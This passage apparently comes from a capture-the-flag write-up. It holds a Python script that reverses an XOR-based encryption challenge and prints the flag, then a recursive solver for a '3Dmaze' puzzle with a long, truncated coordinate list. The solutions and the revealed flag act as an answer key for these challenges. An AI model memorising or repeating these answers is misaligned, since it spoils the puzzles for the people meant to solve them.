    check = b'\x13\x54\xfc\x1a\x92\x71\x57\xa3\x05\xbf\xa8\xb1\x61\x8f\x4a\xd1\x26\x3c\xea\x06\x7c\xd5\x28\x33\x72\x33\x28\x2d\x5f\x2d\x29\x21\x31'
    check = list(check) + [0] * (66 - len(check))
    xor1 = list(b'\x4d\x39\x35\x61\x23\x21\x4e\x31\xc9\x3d\x18\x36\x48\xc1\xf7\xe7\x56\x38\x9d\x7d\xe9\x47\x39\xc0\x77\x8b\xe2\x87\x17\xb9\x38\x9a\xeb\x97\x84\xe8\xc1\x0b\x11\xd6\x5b\x71\xf5\x5b\x2e\xd2\x60\x66\x86\x4c\x6e\x1f\xcf\x0f\x59\x60\x21\x05\x9b\x77\xb9\x90\x78\xd8\x11')
    xor2 = list(b'\x6d\x2e\x33\x25\xc6\x3b\x59\x71\xa4\xfb\xef\xde\xd6\x7b\x1e\x6b\xa0\x23\xec\x87\x19\xd9\x21\xe3\x19\x38\x68\xc8\x8a\xa4\x20\x9c\x55\x23\x49\x3e\x66\x66\x21\x95\xf7\x17\xf6\xfe\xad\x69\x9e\xfe\x28\x0c\x25\xf4\xc2\x01\xba\x51\x8e\xec\xef\x66\x39\xc5\x4f\x21\x37')

def encrypt(left, right, inp_):
    global enc, dec
    tmp1 = enc[left]
    tmp2 = enc[right]
    inp = inp_.copy()
    for i in range(left, int(left+(right-left)/3)):
        inp[i] ^= enc[i]
    if left != 23:
        dec[left] = enc[right]
        enc[left] = dec[right]
    for i_0 in range(int(left+(right-left)/3), right):
        inp[i_0] ^= enc[i_0]
    if right != 44:
        dec[right] = tmp1
        enc[right] = tmp2
    for i_1 in range(left, right):
        inp[i_1] ^= dec[i_1]
    return inp

def decrypt(left, right, inp):
    return encrypt(left,right,encrypt(left,right,encrypt(left,right,inp)))

def pad1():
    global enc, dec, xor1, xor2
    for i in range(0, 17):
        enc[i] ^= xor1[i+16]
    for i in range(0, 13):
        xor1[i] ^= xor1[i+16]
    for i in range(24,43):
        enc[i] ^= xor1[2*i-23]

def pad2():
    global enc, dec, xor1, xor2
    for i in range(14, 26):
        xor2[i] ^= xor1[2*i+3]
    for i in range(40, 56):
        enc[i] ^= xor1[int(i/3)]
    for i in range(26,44):
        xor1[i] ^= xor2[2*i-34]

def pad3():
    global enc, dec, xor1, xor2
    for i in range(14, 34):
        enc[i] ^= xor1[i%5+17]
    for i in range(52, 65):
        enc[i] ^= xor1[i]
    for i in range(17):
        dec[i] ^= xor1[i+16]

def pad4():
    global enc, dec, xor1, xor2
    for i in range(13):
        xor1[i] ^= xor1[i+16]
    for i in range(24, 43):
        dec[i] ^= xor1[2*i-23]
    for i in range(14, 26):
        xor2[i] ^= xor1[2*i+3]
        
def pad5():
    global enc, dec, xor1, xor2
    for i in range(40, 56):
        dec[i] ^= xor1[int(i/3)]
    for i in range(26, 44):
        xor1[i] ^= xor2[2*i-34]
    for i in range(14, 34):
        dec[i] ^= xor1[i%5+17]
    for i in range(52, 65):
        dec[i] ^= xor1[i]

def repad1():
    global enc, dec, xor1, xor2
    for i in range(24,43):
        enc[i] ^= xor1[2*i-23]
    for i in range(0, 13):
        xor1[i] ^= xor1[i+16]
    for i in range(0, 17):
        enc[i] ^= xor1[i+16]

def repad2():
    global enc, dec, xor1, xor2
    for i in range(26,44):
        xor1[i] ^= xor2[2*i-34]
    for i in range(40, 56):
        enc[i] ^= xor1[int(i/3)]
    for i in range(14, 26):
        xor2[i] ^= xor1[2*i+3]

def repad3():
    global enc, dec, xor1, xor2
    for i in range(17):
        dec[i] ^= xor1[i+16]
    for i in range(52, 65):
        enc[i] ^= xor1[i]
    for i in range(14, 34):
        enc[i] ^= xor1[i%5+17]

def repad4():
    global enc, dec, xor1, xor2
    for i in range(14, 26):
        xor2[i] ^= xor1[2*i+3]
    for i in range(24, 43):
        dec[i] ^= xor1[2*i-23]
    for i in range(13):
        xor1[i] ^= xor1[i+16]
        
def repad5():
    global enc, dec, xor1, xor2
    for i in range(52, 65):
        dec[i] ^= xor1[i]
    for i in range(14, 34):
        dec[i] ^= xor1[i%5+17]
    for i in range(26, 44):
        xor1[i] ^= xor2[2*i-34]
    for i in range(40, 56):
        dec[i] ^= xor1[int(i/3)]
    
def main():
    global enc, dec, xor1, xor2, check
    nop = [0] * 70
    pad1()
    encrypt(0, 0x20, nop)
    pad2()
    encrypt(0x20, 0x40, nop)
    pad3()
    encrypt(0xe, 0x2c, nop)
    pad4()
    encrypt(0x17, 0x41, nop)
    pad5()
    encrypt(0, 0x41, nop)
    
    check = decrypt(0, 0x41, check)
    repad5()
    check = decrypt(0x17, 0x41, check)
    repad4()
    check = decrypt(0xe, 0x2c, check)
    repad3()
    check = decrypt(0x20, 0x40, check)
    repad2()
    check = decrypt(0, 0x20, check)
    repad1()
    
    print(bytes(check))

restore()
main()

#b'Llag{6ncr4pt10\xd8@ev6rywh3r3(-_-)!}\x00\x00\x00\x00\x00\x00\x00\xc1\xc1\xf7\xf753=?=357\xb1q;\x02Gc\xf9\x15\xd7\xfe\x0b\xae\x11\x00'

#Spirit{6ncr4pt10n@ev6rywh3r3(-_-)!}

3Dmaze from:(Astrageldon)

exp

'''
Cool🆒! Have u ever played Manifold Garden?
I'll show you a scrennshot: /_Data/MG_3Dmaze.jpg
This problem is quite similar to the ball puzzle.
'''

q = []
last=()
vd=()

s=lambda p,q,r: 40000*r+200*q+p

def ss(p,x,y,z):
    while 1:
        if p==0 and s(x-1,y,z) in a:
            x-=1
        elif p==1 and s(x+1,y,z) in a:
            x+=1
        elif p==2 and s(x,y-1,z) in a:
            y-=1
        elif p==3 and s(x,y+1,z) in a:
            y+=1
        elif p==4 and s(x,y,z-1) in a:
            z-=1
        elif p==5 and s(x,y,z+1) in a:
            z+=1
        else:
            return (x,y,z)

def main(x,y,z):
    global q,vd,last
    s2 = [ss(p,x,y,z) for p in range(6)]
    for i,j in enumerate(s2):
        if s2.count(j)==1 and j != last:
            q.append(i)
            break
    last = vd
    vd = s2[i]
    if (0,0,0) in s2:
        return
    main(*s2[i])
    
    
a = [0x0, 0x9C40, 0x13880, 0x1D4C0, 0x27100, 0x30D40, 0x3A980, 0x445C0, 0x448E7, 0x448E8, 0x448E9, 0x448EA, 0x448EB, 0x448EC, 0x448ED, 0x448EE, 0x448EF, 0x448F0, 0x448F1, 0x448F2, 0x448F3, 0x448F4, 0x448F5, 0x448F6, 0x448F7, 0x448F8, 0x448F9, 0x448FA, 0x448FB, 0x448FC, 0x448FD, 0x448FE, 0x448FF, 0x44900, 0x44901, 0x44902, 0x44903, 0x44904, 0x44905, 0x44906, 0x44907, 0x44908, 0x44909, 0x4490A, 0x4490B, 0x449AF, 0x44A77, 0x44B3F, 0x44C07, 0x44CCF, 0x44D97, 0x44E5F, 0x44F27, 0x44FEF, 0x450B7, 0x4517F, 0x45247, 0x4530F, 0x453D7, 0x4549F, 0x45567, 0x4562F, 0x456F7, 0x457BF, 0x45887, 0x4594F, 0x45A17, 0x45ADF, 0x45BA7, 0x45C6F, 0x45D37, 0x45DFF, 0x45EC7, 0x45F8F, 0x46057, 0x4611F, 0x461E7, 0x462AF, 0x46377, 0x4643F, 0x46507, 0x465CF, 0x46697, 0x4675F, 0x46827, 0x468EF, 0x469B7, 0x46A7F, 0x46B47, 0x46C0F, 0x46CD7, 0x46D9F, 0x46E67, 0x46F2F, 0x46FF7, 0x470BF, 0x47187, 0x4724F, 0x47317, 0x473DF, 0x474A7, 0x4756F, 0x47637, 0x476FF, 0x477C7, 0x4788F, 0x47957, 0x47A1F, 0x47AE7, 0x47BAF, 0x47C77, 0x47D3F, 0x47E07, 0x47ECF, 0x47F97, 0x4805F, 0x48127, 0x481EF, 0x482B7, 0x4837F, 0x48447, 0x4850F, 0x485D7, 0x4869F, 0x48767, 0x4882F, 0x488F7, 0x489BF, 0x48A87, 0x48B4F, 0x48C17, 0x48CDF, 0x48DA7, 0x48E6F, 0x48F37, 0x48FFF, 0x490C7, 0x4918F, 0x49257, 0x4931F, 0x493E7, 0x494AF, 0x49577, 0x4963F, 0x49707, 0x497CF, 0x49897, 0x4995F, 0x49A27, 0x49AEF, 0x49BB7, 0x49C7F, 0x49D47, 0x49E0F, 0x49ED7, 0x49F9F, 0x4A067, 0x4A12F, 0x4A1F7, 0x4A2BF, 0x4A387, 0x4A44F, 0x4A517, 0x4A5DF, 0x4A6A7, 0x4A76F, 0x4A837, 0x4A8FF, 0x4A9C7, 0x4AA8F, 0x4AB57, 0x4AC1F, 0x4ACE7, 0x4ADAF, 0x4AE77, 0x4AF3F, 0x4B007, 0x4B0CF, 0x4B197, 0x4B25F, 0x4B327, 0x4B3EF, 0x4B4B7, 0x4B57F, 0x4B647, 0x4B70F, 0x4B7D7, 0x4B89F, 0x4B967, 0x4BA2F, 0x4BAF7, 0x4BBBF, 0x4BC87, 0x4BD4F, 0x4BE17, 0x4BEDF, 0x4BFA7, 0x4C06F, 0x4C137, 0x4C1FF, 0x4C2C7, 0x4C38F, 0x4C457, 0x4C51F, 0x4C5E7, 0x4C6AF, 0x4C777, 0x4C83F, 0x4C907, 0x4C9CF, 0x4CA97, 0x4CB5F, 0x4CC27, 0x4CCEF, 0x4CDB7, 0x4CE7F, 0x4CF47, 0x4D00F, 0x4D0D7, 0x4D19F, 0x4D267, 0x4D32F, 0x4D3F7, 0x4D4BF, 0x4D587, 0x4D64F, 0x4D717, 0x4D7DF, 0x4D8A7, 0x4D96F, 0x4DA37, 0x4DAFF, 0x4DBC7, 0x4DC8F, 0x4DD57, 0x4E200, 0x4E54B, 0x57997, 0x57E40, 0x5818B, 0x615D7, 0x61A80, 0x61DCB, 0x6B217, 0x6B6C0, 0x6BA0B, 0x74E57, 0x75300, 0x7564B, 0x7EA97, 0x7EF40, 0x7F28B, 0x886D7, 0x88B80, 0x88ECB, 0x92317, 0x927C0, 0x92B0B, 0x9BF57, 0x9C400, 0x9C74B, 0x0A5B97, 0x0A6040, 0x0A638B, 0x0AF7D7, 0x0AFC80, 0x0AFFCB, 0x0B9417, 0x0B98C0, 0x0B9C0B, 0x0C3057, 0x0C3500, 0x0C384B, 0x0CCC97, 0x0CD140, 0x0CD48B, 0x0D68D7, 0x0D6D80, 0x0D70CB, 0x0E0517, 0x0E09C0, 0x0E0D0B, 0x0EA157, 0x0EA600, 0x0EA94B, 0x0F3D97, 0x0F4240, 0x0F458B, 0x0FD9D7, 0x0FDE80, 0x0FE1CB, 0x107617, 0x107AC0, 0x107E0B, 0x111257, 0x111700, 0x111A4B, 0x11AE97, 0x11B340, 0x11B68B, 0x124AD7, 0x124F80, 0x1252CB, 0x12E717, 0x12EBC0, 0x12EF0B, 0x138357, 0x138800, 0x138801, 0x138802, 0x138803, 0x138804, 0x138805, 0x138806, 0x138807, 0x138808, 0x138809, 0x13880A, 0x13880B, 0x13880C, 0x13880D, 0x13880E, 0x13880F, 0x1388D7, 0x13899F, 0x138A67, 0x138B2F, 0x138B4B, 0x138BF7, 0x138CBF, 0x138D87, 0x138E4F, 0x138F17, 0x138FDF, 0x1390A7, 0x13916F, 0x139237, 0x1392FF, 0x1393C7, 0x13948F, 0x139557, 0x13961F, 0x1396E7, 0x1397AF, 0x139877, 0x13993F, 0x139A07, 0x139ACF, 0x139B97, 0x139C5F, 0x139D27, 0x139DEF, 0x139EB7, 0x139F7F, 0x13A047, 0x13A10F, 0x13A1D7, 0x13A29F, 0x13A367, 0x13A42F, 0x13A4F7, 0x13A5BF, 0x13A687, 0x13A74F, 0x13A817, 0x13A8DF, 0x13A9A7, 0x13AA6F, 0x13AB37, 0x13ABFF, 0x13ACC7, 0x13AD8F, 0x13AE57, 0x13AF1F, 0x13AFE7, 0x13B0AF, 0x13B177, 0x13B23F, 0x13B307, 0x13B3CF, 0x13B497, 0x13B55F, 0x13B627, 0x13B6EF, 0x13B7B7, 0x13B87F, 0x13B947, 0x13BA0F, 0x13BAD7, 0x13BB9F, 0x13BC67, 0x13BD2F, 0x13BDF7, 0x13BEBF, 0x13BF87, 0x13C04F, 0x13C117, 0x13C1DF, 0x13C2A7, 0x13C36F, 0x13C437, 0x13C4FF, 0x13C5C7, 0x13C68F, 0x13C757, 0x13C81F, 0x13C8E7, 0x13C9A7, 0x13C9A8, 0x13C9A9, 0x13C9AA, 0x13C9AB, 0x13C9AC, 0x13C9AD, 0x13C9AE, 0x13C9AF, 0x141F97, 0x14278B, 0x1465E7, 0x14BBD7, 0x14C3CB, 0x150227, 0x155817, 0x15600B, 0x159E67, 0x15F457, 0x15FC4B, 0x163AA7, 0x169097, 0x16988B, 0x16D6E7, 0x172CD7, 0x1734CB, 0x177327, 0x17C917, 0x17D10B, 0x180F67, 0x186557, 0x186D4B, 0x18ABA7, 0x190197, 0x19098B, 0x1947E7, 0x199DD7, 0x19A5CB, 0x19E427, 0x1A3A17, 0x1A420B, 0x1A8067, 0x1AD657, 0x1ADE4B, 0x1B1CA7, 0x1B7297, 0x1B7A8B, 0x1BB8E7, 0x1C0ED7, 0x1C16CB, 0x1C5527, 0x1CAB17, 0x1CB30B, 0x1CF167, 0x1D4757, 0x1D4F4B, 0x1D8DA7, 0x1DE397, 0x1DEB8B, 0x1E29E7, 0x1E7FD7, 0x1E87CB, 0x1EC627, 0x1F1C17, 0x1F240B, 0x1F6267, 0x1FB857, 0x1FC04B, 0x1FFEA7, 0x205497, 0x205C8B, 0x209AE7, 0x20F0D7, 0x20F8CB, 0x213727, 0x218D17, 0x21950B, 0x21D367, 0x222957, 0x22314B, 0x226FA7, 0x22C597, 0x22CD8B, 0x230BE7, 0x2361D7, 0x2369CB, 0x23A827, 0x23FE17, 0x24060B, 0x244467, 0x249A57, 0x24A24B, 0x24E0A7, 0x253697, 0x253E8B, 0x257CE7, 0x25D2D7, 0x25DACB, 0x261927, 0x266F17, 0x26770B, 0x26B567, 0x270B57, 0x27134B, 0x2751A7, 0x27A797, 0x27AF8B, 0x27EDE7, 0x2843D7, 0x284BCB, 0x288A27, 0x28E017, 0x28E80B, 0x292667, 0x297C57, 0x29844B, 0x29C2A7, 0x2A1897, 0x2A208B, 0x2A5EE7, 0x2AB4D7, 0x2ABCCB, 0x2AFB27, 0x2B5117, 0x2B590B, 0x2B9767, 0x2BED57, 0x2BF54B, 0x2C33A7, 0x2C8997, 0x2C918B, 0x2CCFE7, 0x2D25D7, 0x2D2DCB, 0x2D6C27, 0x2DC217, 0x2DCA0B, 0x2E0867, 0x2E5E57, 0x2E664B, 0x2EA4A7, 0x2EFA97, 0x2F028B, 0x2F40E7, 0x2F96D7, 0x2F9ECB, 0x2FDD27, 0x303317, 0x303B0B, 0x307967, 0x30CF57, 0x30D74B, 0x3115A7, 0x316B97, 0x31738B, 0x31B1E7, 0x3207D7, 0x320FCB, 0x324E27, 0x32A417, 0x32AC0B, 0x32EA67, 0x334057, 0x33484B, 0x3386A7, 0x33DC97, 0x33E48B, 0x3422E7, 0x3478D7, 0x3480CB, 0x34BF27, 0x351517, 0x351D0B, 0x355B67, 0x35B157, 0x35B94B, 0x35F7A7, 0x364D97, 0x36558B, 0x3693E7, 0x36E9D7, 0x36F1CB, 0x373027, 0x378617, 0x378E0B, 0x37CC67, 0x382257, 0x382A4B, 0x3868A7, 0x38BE97, 0x38C68B, 0x3904E7, 0x395AD7, 0x3962CB, 0x39A127, 0x39F717, 0x39FF0B, 0x3A3D67, 0x3A9357, 0x3A9B4B, 0x3AD9A7, 0x3B2F97, 0x3B378B, 0x3B75E7, 0x3BCBD7, 0x3BD3CB, 0x3C1227, 0x3C6817, 0x3C700B, 0x3CAE67, 0x3D0457, 0x3D0C4B, 0x3D4AA7, 0x3DA097, 0x3DA88B, 0x3DE6E7, 0x3E3CD7, 0x3E44CB, 0x3E8327, 0x3ED917, 0x3EE10B, 0x3F1F67, 0x3F7557, 0x3F7D4B, 0x3FBBA7, 0x401197, 0x40198B, 0x4057E7, 0x40ADD7, 0x40B5CB, 0x40F427, 0x414A17, 0x41520B, 0x419067, 0x41E657, 0x41EE4B, 0x422CA7, 0x428297, 0x428A8B, 0x42C8E7, 0x431ED7, 0x4326CB, 0x436527, 0x43BB17, 0x43C30B, 0x440167, 0x445757, 0x445F4B, 0x449DA7, 0x44F397, 0x44FB8B, 0x4539E7, 0x458FD7, 0x4597CB, 0x45D627, 0x462C17, 0x46340B, 0x467267, 0x46C857, 0x46D04B, 0x470EA7, 0x476497, 0x476C8B, 0x47AAE7, 0x4800D7, 0x4808CB, 0x484727, 0x489D17, 0x48A50B, 0x48E367, 0x493957, 0x49414B, 0x497FA7, 0x49D597, 0x49DD8B, 0x4A1BE7, 0x4A71D7, 0x4A79CB, 0x4A9792, 0x4A9793, 0x4A9794, 0x4A9795, 0x4A9796, 0x4A9797, 0x4A9798, 0x4A9799, 0x4AB827, 0x4B0E17, 0x4B160B, 0x4B33D2, 0x4B33D9, 0x4B5467, 0x4BAA57, 0x4BB24B, 0x4BD012, 0x4BD019, 0x4BF0A7, 0x4C4697, 0x4C4E8B, 0x4C6C52, 0x4C6C59, 0x4C8CE7, 0x4CE2D7, 0x4CEACB, 0x4CF197, 0x4CF25F, 0x4CF327, 0x4CF3EF, 0x4CF4B7, 0x4CF57F, 0x4CF647, 0x4CF70F, 0x4CF7D7, 0x4CF89F, 0x4CF967, 0x4CFA2F, 0x4CFAF7, 0x4CFBBF, 0x4CFC87, 0x4CFD4F, 0x4CFE17, 0x4CFEDF, 0x4CFFA7, 0x4D006F, 0x4D0137, 0x4D01FF, 0x4D02C7, 0x4D038F, 0x4D0457, 0x4D051F, 0x4D05E7, 0x4D06AF, 0x4D0777, 0x4D083F, 0x4D0892, 0x4D0899, 0x4D0907, 0x4D095A, 0x4D09CF, 0x4D0A22, 0x4D0A97, 0x4D0AEA, 0x4D0B5F, 0x4D0BB2, 0x4D0C27, 0x4D0C7A, 0x4D0CEF, 0x4D0D42, 0x4D0DB7, 0x4D0E0A, 0x4D0E7F, 0x4D0ED2, 0x4D0F47, 0x4D0F9A, 0x4D100F, 0x4D1062, 0x4D10D7, 0x4D112A, 0x4D119F, 0x4D11F2, 0x4D1267, 0x4D12BA, 0x4D132F, 0x4D1382, 0x4D13F7, 0x4D144A, 0x4D14BF, 0x4D1512, 0x4D1587, 0x4D15DA, 0x4D164F, 0x4D16A2, 0x4D1717, 0x4D176A, 0x4D17DF, 0x4D1832, 0x4D18A7, 0x4D18FA, 0x4D196F, 0x4D19C2, 0x4D1A37, 0x4D1A8A, 0x4D1AFF, 0x4D1B52, 0x4D1BC7, 0x4D1C1A, 0x4D1C8F, 0x4D1CE2, 0x4D1D57, 0x4D1DAA, 0x4D1E1F, 0x4D1E72, 0x4D1EE7, 0x4D1F3A, 0x4D1FAF, 0x4D2002, 0x4D2077, 0x4D20CA, 0x4D213F, 0x4D2192, 0x4D2207, 0x4D225A, 0x4D22CF, 0x4D2322, 0x4D2397, 0x4D23EA, 0x4D23EB, 0x4D23EC, 0x4D23ED, 0x4D23EE, 0x4D23EF, 0x4D23F0, 0x4D23F1, 0x4D23F2, 0x4D23F3, 0x4D23F4, 0x4D23F5, 0x4D23F6, 0x4D23F7, 0x4D23F8, 0x4D23F9, 0x4D23FA, 0x4D23FB, 0x4D23FC, 0x4D23FD, 0x4D23FE, 0x4D23FF, 0x4D2400, 0x4D2401, 0x4D2402, 0x4D2403, 0x4D2404, 0x4D2405, 0x4D2406, 0x4D2407, 0x4D2408, 0x4D2409, 0x4D240A, 0x4D240B, 0x4D240C, 0x4D240D, 0x4D240E, 0x4D240F, 0x4D2410, 0x4D2411, 0x4D2412, 0x4D2413, 0x4D2414, 0x4D2415, 0x4D2416, 0x4D2417, 0x4D2418, 0x4D2419, 0x4D241A, 0x4D241B, 0x4D241C, 0x4D241D, 0x4D241E, 0x4D241F, 0x4D2420, 0x4D2421, 0x4D2422, 0x4D2423, 0x4D2424, 0x4D2425, 0x4D2426, 0x4D2427, 0x4D2428, 0x4D2429, 0x4D242A, 0x4D242B, 0x4D242C, 0x4D242D, 0x4D242E, 0x4D242F, 0x4D2430, 0x4D2431, 0x4D2432, 0x4D2433, 0x4D2434, 0x4D2435, 0x4D2436, 0x4D2437, 0x4D2438, 0x4D2439, 0x4D243A, 0x4D243B, 0x4D243C, 0x4D243D, 0x4D243E, 0x4D243F, 0x4D2440, 0x4D2441, 0x4D2442, 0x4D2443, 0x4D2444, 0x4D2445, 0x4D2446, 0x4D2447, 0x4D2448, 0x4D2449, 0x4D244A, 0x4D244B, 0x4D244C, 0x4D244D, 0x4D244E, 0x4D244F, 0x4D2450, 0x4D2451, 0x4D2452, 0x4D2453, 0x4D2454, 0x4D2455, 0x4D2456, 0x4D2457, 0x4D2458, 0x4D2459, 0x4D245A, 0x4D245B, 0x4D245C, 0x4D245D, 0x4D245E, 0x4D245F, 0x4D2927, 0x4D7F17, 0x4D870B, 0x4D8DD7, 0x4DA4D9, 0x4DC567, 0x4E1B57, 0x4E234B, 0x4E2A17, 0x4E4119, 0x4E61A7, 0x4EB797, 0x4EBF8B, 0x4EC657, 0x4EDD59, 0x4EFDE7, 0x4F53D7, 0x4F5BCB, 0x4F6297, 0x4F7999, 0x4F9A27, 0x4FF017, 0x4FF80B, 0x4FFED7, 0x5015D9, 0x503667, 0x508C57, 0x50944B, 0x509B17, 0x50B219, 0x50D2A7, 0x512897, 0x51308B, 0x513757, 0x514E59, 0x516EE7, 0x51C4D7, 0x51CCCB, 0x51D397, 0x51D5EF, 0x51D6B7, 0x51D77F, 0x51D847, 0x51D90F, 0x51D9D7, 0x51DA9F, 0x51DB67, 0x51DC2F, 0x51DCF7, 0x51DDBF, 0x51DE87, 0x51DF4F, 0x51E017, 0x51E0DF, 0x51E1A7, 0x51E26F, 0x51E337, 0x51E3FF, 0x51E4C7, 0x51E58F, 0x51E657, 0x51E71F, 0x51E7E7, 0x51E8AF, 0x51E977, 0x51EA3F, 0x51EA99, 0x51EB07, 0x51EBCF, 0x51EC97, 0x51ED5F, 0x51EE27, 0x51EEEF, 0x51EFB7, 0x51F07F, 0x51F147, 0x51F20F, 0x51F2D7, 0x51F39F, 0x51F467, 0x51F52F, 0x51F5F7, 0x51F6BF, 0x51F787, 0x51F84F, 0x51F917, 0x51F9DF, 0x51FAA7, 0x51FB6F, 0x51FC37, 0x51FCFF, 0x51FDC7, 0x51FE8F, 0x51FF57, 0x52001F, 0x5200E7, 0x5201AF, 0x520277, 0x52033F, 0x520407, 0x5204CF, 0x520597, 0x52065F, 0x520727, 0x5207EF, 0x5208B7, 0x52097F, 0x520A47, 0x520B0F, 0x520B27, 0x520BD7, 0x520C9F, 0x520D67, 0x520E2F, 0x520EF7, 0x520FBF, 0x521087, 0x52114F, 0x521217, 0x5212DF, 0x5213A7, 0x52146F, 0x521537, 0x5215FF, 0x5216C7, 0x52178F, 0x521857, 0x52191F, 0x5219E7, 0x521AAF, 0x521B77, 0x521C3F, 0x521D07, 0x521DCF, 0x521E97, 0x521F5F, 0x522027, 0x5220EF, 0x5221B7, 0x52227F, 0x522347, 0x52240F, 0x5224D7, 0x52259F, 0x522667, 0x52272F, 0x5227F7, 0x5228BF, 0x522987, 0x522A4F, 0x522B17, 0x522BDF, 0x522CA7, 0x522D6F, 0x522E37, 0x522EFF, 0x522FC7, 0x52308F, 0x523157, 0x52321F, 0x5232E7, 0x5233AF, 0x523477, 0x52353F, 0x523607, 0x5236CF, 0x523797, 0x52385F, 0x523927, 0x5239EF, 0x523AB7, 0x523B7F, 0x523C47, 0x523D0F, 0x523DD7, 0x523E9F, 0x523F67, 0x52402F, 0x5240F7, 0x5241BF, 0x524287, 0x52434F, 0x524417, 0x5244DF, 0x5245A7, 0x52466F, 0x524737, 0x5247FF, 0x5248C7, 0x52498F, 0x524A57, 0x524B1F, 0x524BE7, 0x524CAF, 0x524D77, 0x524E3F, 0x524F07, 0x524FCF, 0x525097, 0x52515F, 0x525227, 0x5252EF, 0x5253B7, 0x52547F, 0x525547, 0x52560F, 0x5256D7, 0x52579F, 0x525867, 0x52592F, 0x5259F7, 0x525ABF, 0x525B87, 0x525C4F, 0x525D17, 0x525DDF, 0x525EA7, 0x525F6F, 0x526037, 0x526117, 0x52690B, 0x526FD7, 0x52722F, 0x5286D9, 0x52A767, 0x52FC77, 0x52FD57, 0x53054B, 0x530C17, 0x530E6F, 0x532319, 0x5343A7, 0x5398B7, 0x539997, 0x53A18B, 0x53A857, 0x53AAAF, 0x53BF59, 0x53DFE7, 0x5434F7, 0x5435D7, 0x543DCB, 0x544497, 0x5446EF, 0x545B99, 0x547C27, 0x54D137, 0x54D217, 0x54DA0B, 0x54E0D7, 0x54E32F, 0x54F7D9, 0x551867, 0x556D77, 0x556E57, 0x55764B, 0x557D17, 0x557F6F, 0x559419, 0x55B4A7, 0x5609B7, 0x560A97, 0x56128B, 0x561957, 0x561BAF, 0x563059, 0x5650E7, 0x56A5F7, 0x56A6D7, 0x56AECB, 0x56B597, 0x56B7EF, 0x56CC99, 0x56ED27, 0x574237, 0x574317, 0x574B0B, 0x5751D7, 0x57542F, 0x5768D9, 0x578967, 0x57DE77, 0x57DF57, 0x57E74B, 0x57EE17, 0x57F06F, 0x580519, 0x5825A7, 0x587AB7, 0x587B97, 0x58838B, 0x588A57, 0x588CAF, 0x58A159, 0x58C1E7, 0x5916F7, 0x5917D7, 0x591FCB, 0x592697, 0x5928EF, 0x593D99, 0x595E27, 0x59B337, 0x59B417, 0x59BC0B, 0x59C2D7, 0x59C52F, 0x59D9D9, 0x59FA67, 0x5A4F77, 0x5A5057, 0x5A584B, 0x5A5F17, 0x5A616F, 0x5A7619, 0x5A96A7, 0x5AEBB7, 0x5AEC97, 0x5AF48B, 0x5AFB57, 0x5AFDAF, 0x5B1259, 0x5B32E7, 0x5B87F7, 0x5B88D7, 0x5B90CB, 0x5B9797, 0x5B99EF, 0x5BAE99, 0x5BCF27, 0x5C2437, 0x5C2517, 0x5C2D0B, 0x5C33D7, 0x5C362F, 0x5C4AD9, 0x5C6B67, 0x5CC077, 0x5CC157, 0x5CC94B, 0x5CD017, 0x5CD26F, 0x5CE719, 0x5D07A7, 0x5D5CB7, 0x5D5D97, 0x5D658B, 0x5D6C57, 0x5D6EAF, 0x5D8359, 0x5DA3E7, 0x5DF8F7, 0x5DF9D7, 0x5E01CB, 0x5E0897, 0x5E095F, 0x5E0A27, 0x5E0AEF, 0x5E1F99, 0x5E1F9A, 0x5E1F9B, 0x5E1F9C, 0x5E1F9D, 0x5E1F9E, 0x5E1F9F, 0x5E1FA0, 0x5E1FA1, 0x5E1FA2, 0x5E1FA3, 0x5E1FA4, 0x5E1FA5, 0x5E1FA6, 0x5E1FA7, 0x5E1FA8, 0x5E1FA9, 0x5E1FAA, 0x5E1FAB, 0x5E1FAC, 0x5E1FAD, 0x5E1FAE, 0x5E1FAF, 0x5E1FB0, 0x5E1FB1, 0x5E1FB2, 0x5E1FB3, 0x5E1FB4, 0x5E1FB5, 0x5E1FB6, 0x5E1FB7, 0x5E1FB8, 0x5E1FB9, 0x5E1FBA, 0x5E1FBB, 0x5E1FBC, 0x5E1FBD, 0x5E1FBE, 0x5E1FBF, 0x5E1FC0, 0x5E1FC1, 0x5E1FC2, 0x5E1FC3, 0x5E1FC4, 0x5E1FC5, 0x5E1FC6, 0x5E1FC7, 0x5E1FC8, 0x5E1FC9, 0x5E1FCA, 0x5E1FCB, 0x5E1FCC, 0x5E1FCD, 0x5E1FCE, 0x5E1FCF, 0x5E1FD0, 0x5E1FD1, 0x5E1FD2, 0x5E1FD3, 0x5E1FD4, 0x5E1FD5, 0x5E209D, 0x5E2165, 0x5E222D, 0x5E22F5, 0x5E23BD, 0x5E2485, 0x5E254D, 0x5E2615, 0x5E26DD, 0x5E27A5, 0x5E286D, 0x5E2935, 0x5E29FD, 0x5E2AC5, 0x5E2B8D, 0x5E2C55, 0x5E2D1D, 0x5E2DE5, 0x5E2EAD, 0x5E2F75, 0x5E303D, 0x5E3105, 0x5E31CD, 0x5E3295, 0x5E335D, 0x5E3425, 0x5E34ED, 0x5E35B5, 0x5E367D, 0x5E3745, 0x5E380D, 0x5E38D5, 0x5E399D, 0x5E3A65, 0x5E3B2D, 0x5E3BF5, 0x5E3CBD, 0x5E3D85, 0x5E3E4D, 0x5E3F15, 0x5E3FDD, 0x5E4027, 0x5E40A5, 0x5E416D, 0x5E4235, 0x5E42FD, 0x5E43C5, 0x5E448D, 0x5E4555, 0x5E461D, 0x5E46E5, 0x5E47AD, 0x5E9537, 0x5E9617, 0x5E9E0B, 0x5EDC67, 0x5EE3ED, 0x5F3177, 0x5F3257, 0x5F3A4B, 0x5F78A7, 0x5F802D, 0x5FCDB7, 0x5FCE97, 0x5FD68B, 0x6014E7, 0x601C6D, 0x6069F7, 0x606AD7, 0x6072CB, 0x60B127, 0x60B8AD, 0x610637, 0x610717, 0x610F0B, 0x614D67, 0x6154ED, 0x61A277, 0x61A357, 0x61AB4B, 0x61E9A7, 0x61F12D, 0x623EB7, 0x623F97, 0x62478B, 0x6285E7, 0x628D6D, 0x62DAF7, 0x62DBD7, 0x62E3CB, 0x632227, 0x6329AD, 0x637737, 0x637817, 0x63800B, 0x63BE67, 0x63C5ED, 0x641377, 0x641457, 0x641C4B, 0x645AA7, 0x64622D, 0x64AFB7, 0x64B097, 0x64B88B, 0x64F6E7, 0x64FE6D, 0x654BF7, 0x654CD7, 0x6554CB, 0x659327, 0x659AAD, 0x65E837, 0x65E917, 0x65F10B, 0x662F67, 0x6636ED, 0x668477, 0x668557, 0x668D4B, 0x66CBA7, 0x66D32D, 0x6720B7, 0x672197, 0x67298B, 0x6767E7, 0x676F6D, 0x67BCF7, 0x67BDD7, 0x67C5CB, 0x680427, 0x680BAD, 0x685937, 0x685A17, 0x68620B, 0x68A067, 